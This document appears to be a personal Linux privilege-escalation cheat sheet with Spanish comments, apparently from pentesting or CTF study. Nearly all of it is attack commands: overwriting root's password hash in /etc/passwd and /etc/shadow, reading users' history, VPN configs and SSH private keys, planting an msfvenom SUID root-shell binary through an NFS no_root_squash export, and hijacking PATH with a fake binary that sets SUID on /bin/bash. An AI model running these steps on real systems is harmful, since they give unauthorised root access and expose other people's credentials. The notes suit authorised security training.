Privesc

openssl passwd <new_pass>
nano /etc/passwd
# Cambiar pass Root.

mkpasswd -m sha-512 <new_pass> # Hasheamos nueva pass.
nano /etc/shadow
# Sustituir hash pass de Root.

cat ~/.history | less

ls /home/<user>
cat /home/<user>/myvpn.ovpn

ls -l home/<user>/.ssh
chmod 600 idrsa
ssh -i idrsa <user>@<IP>

# Archivos creados por NFS guardan el ID remoto del user

cat /etc/exports # Buscar "no_root_squash" en algún campo

# En tu máquina
mkdir /tmp/nfs
mount -o rw,vers=2 <IPv>:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs shell.elf

# Máquina vícitima
/tmp/shell.elf

nano <fake-binario>
# chmod u+s /bin/bash < Contenido del binario
chmod +x <fake-binario>
export PATH=/tmp:$PATH
# Ejecutamos script
bash -p

strings <binario>

watch -n 1 ls -l <file_path>